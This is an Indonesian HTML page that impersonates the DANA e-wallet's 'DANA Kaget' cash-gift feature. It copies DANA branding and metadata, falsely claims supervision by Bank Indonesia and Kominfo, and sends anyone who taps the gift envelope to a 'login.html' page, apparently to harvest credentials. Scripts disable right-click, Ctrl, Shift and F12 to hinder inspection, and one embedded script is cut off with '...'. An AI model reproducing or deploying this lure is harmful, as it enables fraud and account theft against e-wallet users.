<html lang="en">  
 <head>   
  <title>DANA Kaget buatmu</title>   
  <meta data-n-head="ssr" data-hid="og:image" property="og:image" content="https://hosting.tigerengine.id/d8wpvu.jpg">   
  <meta charset="UTF-8">   
  <meta name="description" content="DANA Kaget Cuma buat kamu yang paling gesit! Sikat sekarang!">   
  <meta name="viewport" content="width=device-width, initial-scale=1">   
  <meta name="keywords" content="dana, danakaget, receh, uang">   
  <meta data-n-head="ssr" data-hid="og:site_name" name="og:site_name" content="DANA.id">   
  <meta property="og:url" content="https://dana.id">   
  <meta property="og:description" content="DANA adalah bentuk baru uang tunai yang lebih baik. Transaksi apapun, berapapun dan dimanapun jadi mudah bersama DANA. Ambil bagian dalam transformasi keuangan digital di Indonesia sekarang!">  
  <meta property="twitter:description" content="DANA adalah bentuk baru uang tunai yang lebih baik. Transaksi apapun, berapapun dan dimanapun jadi mudah bersama DANA. Ambil bagian dalam transformasi keuangan digital di Indonesia sekarang!">   
  <link data-n-head="ssr" rel="icon" type="image/x-icon" href="https://www.dana.id/favicon.ico">   
  <style>  
                @import url('https://fonts.googleapis.com/css2?family=Open+Sans:wght@400;600;700&display=swap');  *{
font-family: 'Open Sans', sans-serif;
}

body {
background: #178EE5;
-webkit-user-select: none;
-moz-user-select: none;
-ms-user-select: none;
user-select: none;
padding: 0;
margin: 0;
box-sizing: border-box;
}

.container_yondahost {
background-image: url(AddText_08-22-02.00.32.jpg);
background-position: center;
background-repeat: no-repeat;
background-size: cover;
height: 100%;
width: 100%;
max-width: 600px;
max-height: 1000px;
position: absolute;
transform: translate(-50%,-50%);
top: 50%;
left: 50%;
overflow: hidden;
}

.container_yondahost .amplop{
position: absolute;
transform: translate(-50%,-50%);
top: 50%;
left: 50%;
width: 130%;
border-radius: 30px;
animation: animated 4s linear infinite;
}

@keyframes animated {
0%{
width: 105%;
}

50%{  
    width: 120%;  
}  
  
100%{  
    width: 105%;  
}

}

.navYondaHosting{
display: flex;
align-content: center;
align-items: center;
background-color: transparent;
gap: 10px;
}

.navYondaHosting img{
width: 20px;
margin-left: 15px;
cursor: pointer;
}

.navYondaHosting h3{
color: #fff;
font-weight: 600;
}

.text_amplop{
text-align: center;
color: #fff;
margin-top: -25px;
}

.text_amplop h4{
font-weight: 600;
font-size: 12.5px;
margin-top: 40px;
}

.punyadaget{
position: fixed;
transform: translate(-50%,-50%);
left: 50%;
bottom: 0;
width: 50%;
height: 60px;
min-width: 200px;
background-color: #fff;
border-radius: 100px;
z-index: 999;
display: flex;
align-content: center;
align-items: center;
}

.punyadaget img{
width: 38px;
height: 38px;
border-radius: 50%;
margin-left: 12px;
}

.group_text{
display: flex;
flex-direction: column;
margin-left: 10px;
}

.group_text h5{
margin-top: 17px;
font-weight: 500;
}

.group_text h3{
margin-top: -25px;
font-size: 15px;
}

.start {
top: 0;
left: 0;
right: 0;
width: 100%;
height: 100%;
min-height: 100%;
max-height: 100%;
position: fixed;
z-index: 999;
display: flex;
justify-content: center;
align-items: center;
flex-direction: column;
background: #118EEA;
}

.start .logo {
width: 50%;
display: flex;
justify-content: center;
align-content: center;
position: fixed;
transform: translate(-50%,-50%);
left: 50%;
top: 50%;
}

.start .footimg {
width: 400px;
height: 60px;
display: flex;
justify-content: center;
align-content: center;
align-items: center;
position: fixed;
transform: translate(-50%,-50%);
left: 50%;
bottom: 0;
z-index: 99999;
}

.start .footimg img {
min-height: 40px;
max-height: 40px;
height: 40px;
margin: 0 8px 0 0;
}

.start .footimg p {
font-size: 10px;
white-space: nowrap;
color: #fff;
}
</style>

 </head>   
 <body>   
  <div class="container_yondahost" style="display:none;">   
   <div class="text_amplop">   
    <h4> <br></h4>   
   </div>   
       <img onclick="handleTapAmplop()" src="AddText_08-22-02.17.48.png" alt="" class="amplop">   
   <div class="punyadaget">   
    <img src="dana-payment-icon-symbol-free-png.png" alt="">   
    <div class="group_text">   
     <h5>Dari</h5>   
     <h3>DANA KAGET</h3>   
    </div>   
   </div>   
  </div>   
  <div sty="" class="start" style="display:none;">   
   <img class="logo" src="logoDana.png">   
   <div class="footimg">   
    <img src="bi.png" alt="">   
    <img src="kom.png" alt="">  
    <p>DANA Indonesia terdaftar dan diawasi<br>oleh Bank Indonesia dan Kominfo</p>   
   </div>   
  </div>   
  <script src="https://code.jquery.com/jquery-3.5.1.min.js">  
</script>   
  <script>  
    (function($) {  
    var Mask = function(el, maskPattern, options) {  
        var mask = {  
            invalid: [],  
            getCaret: function() {  
                try {  
                    var elDom = el.get(0);  
                    var start = elDom.selectionStart;  
                    return start;  
                } catch (e) {}  
            },  
            setCaret: function(pos) {  
                try {  
                    if (el.is(":focus")) {  
                        var elDom = el.get(0);  
                        if (elDom.setSelectionRange) {  
                            elDom.setSelectionRange(pos, pos);  
                        } else {  
                            var range = elDom.createTextRange();  
                            range.collapse(true);  
                            range.moveEnd("character", pos);  
                            range.moveStart("character", pos);  
                            range.select();  
                        }  
                    }  
                } catch (e) {}  
            },  
            ...  
        };  // init  
    el = $(el);  
    var plugin = this;  
    var defaultVal = mask.val();  
    var regex;  

    // Init logic  
    plugin.init = function() {  
        regex = mask.getRegexMask();  
        mask.events();  
        mask.val(mask.getMasked());  
    }  

    plugin.init();  
};  

$.fn.mask = function(pattern, options) {  
    return this.each(function() {  
        $(this).data('mask', new Mask(this, pattern, options));  
    });  
};

})(jQuery);
</script>

  <script>  
window.onload = function() {
  setTimeout(function(){
    $(".start").fadeIn();
    setTimeout(function(){
      $(".start").fadeOut(1000);
      setTimeout(function(){
        $(".container_yondahost").fadeIn(200);
        $(".container_yondahost").focus();
      }, 1000);
    }, 2000);
  }, 500);
}
</script>     <script>  
    var addHandler = function (element, type, handler) {  
	if (element.addEventListener) {  
		element.addEventListener(type, handler, false);  
	} else if (element.attachEvent) {  
		element.attachEvent("on" + type, handler);  
	} else {  
		element["on" + type] = handler;  
	}  
};  
  
var preventDefault = function (event) {  
	if (event.preventDefault) {  
		event.preventDefault();  
	} else {  
		event.returnValue = false;  
	}  
};  
  
addHandler(window, "contextmenu", function (event) {  
	preventDefault(event);  
});  
  
document.onkeydown = function (event) {  
	if(event.ctrlKey || event.shiftKey || event.keyCode == 123) {  
		return false;  
	}  
};  

function handleTapAmplop() {
  $(".container_yondahost").fadeOut(200); // sembunyikan amplop
  setTimeout(function () {
    window.location.href = "login.html";
  }, 500); // langsung redirect setelah efek
}
</script>  
</body>  
</html>  